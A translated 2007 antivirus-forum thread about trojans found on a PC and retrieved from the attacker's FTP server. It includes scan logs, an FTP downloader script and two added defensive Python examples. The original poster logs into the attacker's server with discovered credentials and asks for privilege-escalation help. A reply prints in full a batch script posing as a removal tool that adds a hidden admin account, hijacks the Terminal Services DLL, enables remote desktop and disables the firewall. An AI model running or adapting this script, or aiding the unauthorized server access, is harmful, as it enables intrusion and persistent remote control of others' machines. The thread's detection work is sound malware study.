[Virus sample] Reverse-captured all the trojans sitting on the FTP, haha... everyone come and study them too

Cloud018
Posted 2007-8-24 09:44:12
Just noticed two extra processes, wscript.exe and cmd.exe, and knew something was wrong... Checked their command lines right away and found:
C:\windows\system32\wscript.exe C:\run.vbs
C:\windows\system32\cmd.exe C:\ff.bat
After killing the processes, I found 4 files in C:\: run.vbs, ff.bat, a.bat and gz
Opened gz with notepad.exe; its contents were:
=====================
open XX.XXX.XX.XXX
123
123
binary
get 1.vbs c:\aa.vbs
bye
=====================
Great! Looks like the FTP username and password are both 123
Tried it, and sure enough it worked! ^_^
Brought back N of them for everyone, ha, take your time playing with them

PS: Because this FTP has permissions set, I can't modify files, create files or change the password, frustrating... If anyone knows a way to escalate privileges on FTP, please advise...
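A small parser for the `ftp -s:` command-file format the gz script above is written in, added here as an example (not part of the original post): it pulls out the drop host, the positional username/password lines and each transfer so the values can go straight into blocklists and incident notes. FTP_SCRIPT is a constructed sample mirroring gz, with a documentation address in place of the redacted host.

```python
# Constructed sample in the shape of the posted gz file (host is a
# documentation address, not the real one).
FTP_SCRIPT = r"""open 192.0.2.10
123
123
binary
get 1.vbs c:\aa.vbs
bye
"""


def parse_ftp_script(text):
    """Return host, credentials, transfer mode and every file transfer.

    In an ftp -s: script the username and password are not commands: after
    `open`, the next two bare lines are consumed by the login prompts. The
    explicit `user NAME PASS` form is accepted as well.
    """
    info = {"host": None, "user": None, "password": None,
            "mode": "ascii", "transfers": []}
    pending_login = False
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts:
            continue
        cmd, args = parts[0].lower(), parts[1:]
        if cmd == "open" and args:
            info["host"] = args[0]
            pending_login = True
        elif cmd == "user" and args:
            info["user"] = args[0]
            info["password"] = args[1] if len(args) > 1 else None
            pending_login = False
        elif pending_login and info["user"] is None:
            info["user"] = parts[0]          # first bare line answers the user prompt
        elif pending_login and info["password"] is None:
            info["password"] = parts[0]      # second bare line answers the password prompt
            pending_login = False
        elif cmd in ("binary", "ascii"):
            info["mode"] = cmd
        elif cmd in ("get", "put", "mget", "mput") and args:
            local = args[1] if len(args) > 1 else args[0]
            info["transfers"].append({"op": cmd, "remote": args[0], "local": local})
        elif cmd in ("bye", "quit"):
            break
    return info


if __name__ == "__main__":
    print(parse_ftp_script(FTP_SCRIPT))
```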

红心王子
Posted 2007-8-24 09:48:01
江民杀毒软件报告文件

        北京江民新科技术有限公司

        扫描引擎 11.00.700
        病毒库日期 2007-08-23
        更新日期 2007-08-24

扫描目标 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\

开始时间 2007-08-24 09:47:15

在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\sxcz1314-3344.exe 中发现 Backdoor/Huigezi.2007.tux 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\onlinek-ip03.exe 中发现 Backdoor/Huigezi.2007.ifm 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\3-8004.exe 中发现 Backdoor/Huigezi.2007.gzu 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\3-8005.exe 中发现 Backdoor/Huigezi.2007.gzu 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\5-8005.exe 中发现 Backdoor/Huigezi.2007.gzu 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\07-5-8003.exe 中发现 Backdoor/Huigezi.2007.abfr 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\135.exe 中发现 Backdoor/Huigezi.2007.gzu 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\anniu.exe 中发现 TrojanDownloader.Small.hpj 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\7788.exe->aio.exe 中发现 Trojan/PSW.GamePass.szb 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\7788.exe->ipseccmd.exe 中发现 Trojan/PSW.GamePass.szc 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\down.exe 中发现 Backdoor/Agent.rqk 病毒, 已删除
在 C:\Documents and Settings\Administrator\桌面\新建文件夹 (2)\gz.exe 中发现 Backdoor/Agent.rqk 病毒, 已删除
正常结束。

扫描结果:
                 文件数 :492                                 病毒体 :12        
                   删除 :12                                    解毒 :0         
    扫描速度(千字节/秒) :7949                              扫描时间 :00:00:16
    扫描文件速度(个/秒) :30
Cloud018
OP | Posted 2007-8-24 09:51:11
Looks like the finger points at Kaspersky: KAV 6 only caught 2

2007-8-24 9:47:51        文件: C:\Documents and Settings\SYSTEM\桌面\1.vbs        ok        已扫描
2007-8-24 9:47:55        文件: C:\Documents and Settings\SYSTEM\桌面\135.exe        ok        已扫描
2007-8-24 9:47:50        文件: C:\Documents and Settings\SYSTEM\桌面\07-5-8003.exe        ok        已扫描
2007-8-24 9:48:05        文件: C:\Documents and Settings\SYSTEM\桌面\3-8004.exe        ok        已扫描
2007-8-24 9:48:05        文件: C:\Documents and Settings\SYSTEM\桌面\3-8005.exe        ok        已扫描
2007-8-24 9:48:05        文件: C:\Documents and Settings\SYSTEM\桌面\5-8005.exe        ok        已扫描
2007-8-24 9:48:06        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe        压缩文件 RarSFX        
2007-8-24 9:48:06        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar        压缩文件 RAR        
2007-8-24 9:48:06        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\archive comment        ok        已扫描
2007-8-24 9:48:07        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\xp.bat        ok        已扫描
2007-8-24 9:48:07        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\1.vbs        ok        已扫描
2007-8-24 9:48:07        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\aio.exe        ok        已扫描
2007-8-24 9:48:08        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\ipseccmd.exe        ok        已扫描
2007-8-24 9:48:10        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\termsrvhack.dll        ok        已扫描
2007-8-24 9:48:16        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\tskill.EXE        已检测 风险软件 not-a-virus:NetTool.Win32.PsKill.a        
2007-8-24 9:48:16        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\1.bat        ok        已扫描
2007-8-24 9:48:16        文件: C:\Documents and Settings\SYSTEM\桌面\7788.exe/data.rar\mdb.txt        ok        已扫描
2007-8-24 9:48:16        文件: C:\Documents and Settings\SYSTEM\桌面\anniu.exe        ok        已扫描
2007-8-24 9:48:16        文件: C:\Documents and Settings\SYSTEM\桌面\dos.vnet.8800.exe        ok        已扫描
2007-8-24 9:48:17        文件: C:\Documents and Settings\SYSTEM\桌面\down.exe        已检测 病毒 Virus.Win32.AutoRun.ek        
2007-8-24 9:48:18        文件: C:\Documents and Settings\SYSTEM\桌面\gz.exe        已检测 病毒 Virus.Win32.AutoRun.ek        
2007-8-24 9:48:25        文件: C:\Documents and Settings\SYSTEM\桌面\onlinek-ip03.exe        ok        已扫描
2007-8-24 9:48:53        文件: C:\Documents and Settings\SYSTEM\桌面\sxcz1314-3344.exe        ok        已扫描

[ This post was last edited by Cloud018 on 2007-8-24 09:54 ]
sbbdms
Posted 2007-8-24 09:51:46
Kaspersky doesn't flag anything in the first package at all...
woai_jolin
Posted 2007-8-24 09:51:46
2007-8-24 9:49:59        Scanning Log
2007-8-24 9:49:59        Version of virus signature database: 2481 (20070823)
2007-8-24 9:49:59        Date: 24.8.2007  Time: 09:49:59
2007-8-24 9:49:59        Scanned disks, folders and files: F:\v
2007-8-24 9:50:04        F:\v\07-5-8003.exe - probably a variant of Win32/GreyBird trojan - cleaned by deleting - quarantined [1]
2007-8-24 9:51:06        F:\v\7788.exe » RAR » aio.exe - probably a variant of Win32/Genetik trojan
2007-8-24 9:51:07        F:\v\anniu.exe - Win32/PSW.Legendmir.SY trojan - cleaned by deleting - quarantined [1]
2007-8-24 9:51:17        F:\v\dos.vnet.8800.exe - a variant of Win32/PSW.QQRob.NAQ trojan - cleaned by deleting - quarantined [1]
2007-8-24 9:51:19        F:\v\down.exe - a variant of Win32/Delf.NDF worm - cleaned by deleting - quarantined [1]
2007-8-24 9:51:20        F:\v\gz.exe - a variant of Win32/Delf.NDF worm - cleaned by deleting - quarantined [1]
2007-8-24 9:51:24        F:\v\onlinek-ip03.exe - a variant of Win32/Hupigon trojan - cleaned by deleting - quarantined [1]
2007-8-24 9:51:40        Number of scanned files: 43
2007-8-24 9:51:40        Number of threats found: 7
2007-8-24 9:51:40        Time of completion: 09:51:40  Total scanning time: 101 sec (00:01:41)
2007-8-24 9:51:40       
2007-8-24 9:51:40        Notes:
2007-8-24 9:51:40        [1] File has been deleted as it contained only the virus body.
风野胤
Posted 2007-8-24 09:52:23

Reply to post #4 by sbbdms

Whether the first package gets flagged or not doesn't matter
Cloud018
OP | Posted 2007-8-24 09:53:31
Originally posted by 风野胤 on 2007-8-24 09:52:
Whether the first package gets flagged or not doesn't matter

Right, what matters most is the EXE and that VBS in the second package
风野胤
Posted 2007-8-24 09:55:16
It even has a "dedicated removal tool" inside
I'm floored

@echo off
@aio -terminal 7788
@net1 user guest 123 /add
@net1 uesr guest 123
@net1 localgroup administrators guest /add
@net1 user guest /active:yes
@aio -clone administrator guest 123
Tasklist/SVC >>1.txt
type 1.txt | find "DcomLaunch" >2.txt
for /f "eol= tokens=1,2 delims= " %%i in (2.txt) do ntsd -c q -p %%j
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy termsrvhack.dll %SystemRoot%\System32\termsrvhack.dll
@Attrib +H +S +R %SystemRoot%\System32\termsrvhack.dll
@shutdown -a
@shutdown -a
@shutdown -a
@del termsrvhack.dll
@del 1.txt
@del 2.txt
@net stop sharedaccess
@net start dcomlaunch
@net start termservice
@echo Windows Registry Editor Version 5.00>> 1.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>> 1.reg
@echo [-HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>> 1.reg
@regedit /s 1.reg
@del 1.reg
@echo ok >> c:\7788OK.ini
@ATTRIB -R -H -S -A "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*"
@DEL /F /Q /A -R -H -S -A "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\*.*"
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo::删除木马,请稍侯
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
tskill rundl132.exe
tskill rundll32.exe
tskill logo_1.exe
tskill logo1_.exe
tskill hh.exe
tskill aa.exe
tskill 1.exe
tskill 2.exe
tskill 3.exe
tskill 4.exe
tskill 5.exe
tskill 6.exe
tskill 7.exe
tskill 8.exe
tskill 9.exe
tskill spoclsv.exe
tskill SVCH0ST.exe
tskill svohost.exe
tskill sxs.exe
del %Windir%\MickNew\MickNew.dll
del %Windir%\MH_FILE\MH_DLL.dll
del %Windir%\TODAYZTKING\TODAYZTKING.DLL
del %windir%\system\Logo1_.exe
del %windir%\rundl132.exe
del %windir%\vDll.dll
del %windir%\Dll.dll
del %windir%\1.exe
del %windir%\2.exe
del %windir%\3.exe
del %windir%\4.exe
del %windir%\5.exe
del %windir%\6.exe
del %windir%\7.exe
del %windir%\8.exe
del %windir%\9.exe
del %windir%\SVCH0ST.exe
del %windir%\logo_1.exe
del %windir%\svohost.exe
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo::清除灰鸽子和上兴等木马程序,请稍侯.......
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@aio -EnumService Stopped > info.txt
@for /f "eol= tokens=1 delims= " %%i in (mdb.txt) do find /i "%%i" info.txt >>muma.txt
@for /f "eol=- tokens=4 delims= " %%i in (muma.txt) do sc config %%i start= disabled
@for /f "eol=- tokens=4 delims= " %%i in (muma.txt) do sc delete %%i
@for /f "eol=- tokens=4 delims= " %%i in (muma.txt) do sc config %%i start= disabled
@for /f "eol=- tokens=4 delims= " %%i in (muma.txt) do sc delete %%i
@del info.txt
@del muma.txt
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo::恢复注册表中不给设置显示隐藏文件的项目,请稍侯
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
echo Windows Registry Editor Version 5.00> delshare.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]>> delshare.reg
echo "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced">> delshare.reg
echo "Text"="@shell32.dll,-30500">> delshare.reg
echo "Type"="radio">> delshare.reg
echo "CheckedValue"=dword:00000001>> delshare.reg
echo "ValueName"="Hidden">> delshare.reg
echo "DefaultValue"=dword:00000002>> delshare.reg
echo "HKeyRoot"=dword:80000001>> delshare.reg
echo "HelpID"="shell.hlp#51105">> delshare.reg
regedit /s delshare.reg
del delshare.reg
echo Windows Registry Editor Version 5.00> cc.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]>> cc.reg
echo "DebugOptions"="2048">> cc.reg
echo "Documents"="">> cc.reg
echo "DosPrint"="no">> cc.reg
echo "load"=->> cc.reg
echo "NetMessage"="no">> cc.reg
echo "NullPort"="None">> cc.reg
echo "programs"="com exe bat pif cmd">> cc.reg
echo "Device"="">> cc.reg
regedit /s cc.reg
del cc.reg
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo::删除每个分区下的SXS.EXE和AUTORUN.INF文件,请稍侯.......
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
FOR %%a IN ( C: D: E: F: G: H: ) DO ATTRIB -R -H -S -A %%a\SXS.EXE & DEL /F /Q /A -R -H -S -A %%a\SXS.EXE & ATTRIB -R -H -S -A %%a\setup.exe & DEL /F /Q /A -R -H -S -A %%a\setup.exe & ATTRIB -R -H -S -A %%a\system.exe & DEL /F /Q /A -R -H -S -A %%a\system.exe & ATTRIB -R -H -S -A %%a\rose.exe & DEL /F /Q /A -R -H -S -A %%a\rose.exe & ATTRIB -R -H -S -A %%a\AUTORUN.INF & DEL /F /Q /A -R -H -S -A %%a\AUTORUN.INF

@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo::关闭有害端口,请稍侯.......
@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
ipseccmd  -w REG -p "HFUT_SECU" -r "Block UDP/137" -f *+0:137:UDP -n BLOCK -x
ipseccmd  -w REG -p "HFUT_SECU" -r "Block UDP/138" -f *+0:138:UDP -n BLOCK -x
ipseccmd  -w REG -p "HFUT_SECU" -r "Block TCP/139" -f *+0:139:TCP -n BLOCK -x
ipseccmd  -w REG -p "HFUT_SECU" -r "Block TCP/135" -f *+0:135:TCP -n BLOCK -x
ipseccmd  -w REG -p "HFUT_SECU" -r "Block UDP/135" -f *+0:135:UDP -n BLOCK -x
net share c$ /del
net share d$ /del
net share e$ /del
net share f$ /del
net share admin$ /del
net share ipc$ /del
@del 1.vbs
@del c:\boot.exe
@del c:\ghost.exe
@aio -reboot
@aio -reboot && del 1.bat
@exit
碧水寒潭
Posted 2007-8-24 09:56:03
Start of the scan: 2007年8月24日  09:55

Starting the file scan:

Begin scan in 'H:\AV-TEST'
H:\AV-TEST\N个[1].part1.rar
  [0] Archive type: RAR
  --> onlinek-ip03.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
H:\AV-TEST\N个[1].part2.rar
  [0] Archive type: RAR
  --> 3-8004.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
H:\AV-TEST\N个[1].part3.rar
  [0] Archive type: RAR
  --> 5-8005.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
H:\AV-TEST\N个[1].part4.rar
  [0] Archive type: RAR
  --> 135.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [INFO]      The file was deleted!
H:\AV-TEST\N个[1].part5.rar
  [0] Archive type: RAR
  --> anniu.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Anskya.A.1
  --> dos.vnet.8800.exe
      [DETECTION] Is the Trojan horse TR/Crypt.FKM.Gen
  --> down.exe
      [DETECTION] Contains suspicious code HEUR/Crypted
  --> gz.exe
      [DETECTION] Contains suspicious code HEUR/Crypted
      [INFO]      The file was deleted!


End of the scan: 2007年8月24日  09:55
Used time: 00:33 min

The scan has been done completely.

      1 Scanning directories
     23 Files were scanned
      8 viruses and/or unwanted programs were found
      2 classified as suspicious:
      5 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     13 Files not concerned
      6 Archives were scanned
      0 Warnings
      0 Notes
      0 Hidden objects were found
solcroft
Posted 2007-8-24 09:58:48

Reply to post #8 by 风野胤

This "removal tool" is fishy
Why does it copy a hidden DLL into the system32 directory and then pretend to delete it?
And it quietly adds an admin account too
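A static triage pass over the posted "removal tool", added here as an example and not code from any post: it flags the behaviours solcroft points out (a DLL copied into System32, hidden, and only the source copy deleted; a hidden guest admin account) together with the Terminal Services ServiceDll swap, the RDP enablement, the firewall stop and the wiped Run keys that are visible in the script. Indicator names are this example's own; SAMPLE is a constructed excerpt of the posted batch file.

```python
import re

# Defensive signatures for behaviours the posted batch file performs.
# Indicator names are this example's own, not from the original thread.
INDICATORS = {
    "hidden_account_added": re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add", re.I),
    "admin_group_change": re.compile(r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add", re.I),
    "termservice_dll_hijack": re.compile(r"Services\\TermService\\Parameters\s+/v\s+ServiceDll", re.I),
    "rdp_enabled": re.compile(r"fDenyTSConnections\s+/t\s+REG_DWORD\s+/d\s+0+\b", re.I),
    "file_hidden_in_system32": re.compile(r"\battrib\s+(\+[HSR]\s*)+.*System32", re.I),
    "firewall_stopped": re.compile(r"\bnet\s+stop\s+sharedaccess", re.I),
    "run_keys_wiped": re.compile(r"\[-HKEY_(LOCAL_MACHINE|CURRENT_USER)\\.*\\Run\]", re.I),
}

# Constructed excerpt of the posted script; reported line numbers refer to it.
SAMPLE = r"""@echo off
@net1 user guest 123 /add
@net1 localgroup administrators guest /add
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy termsrvhack.dll %SystemRoot%\System32\termsrvhack.dll
@Attrib +H +S +R %SystemRoot%\System32\termsrvhack.dll
@del termsrvhack.dll
@net stop sharedaccess
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>> 1.reg
tskill rundl132.exe
"""


def triage_batch(text):
    """Map each indicator name to the 1-based line numbers where it fires."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def pretends_to_delete(text):
    """Files copied elsewhere and then 'deleted' only at the source: the
    copy-then-del trick that makes a dropper look like a clean-up step."""
    copied = {m.group(1).lower() for m in re.finditer(r"\bcopy\s+(\S+)\s+\S+", text, re.I)}
    deleted = {m.group(1).lower() for m in re.finditer(r"\bdel\s+(\S+)", text, re.I)}
    return sorted(copied & deleted)


if __name__ == "__main__":
    for name, lines in triage_batch(SAMPLE).items():
        print(f"{name}: lines {lines}")
    print("copied then deleted:", pretends_to_delete(SAMPLE))
```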
Copyright © KaFan  KaFan.cn All Rights Reserved.
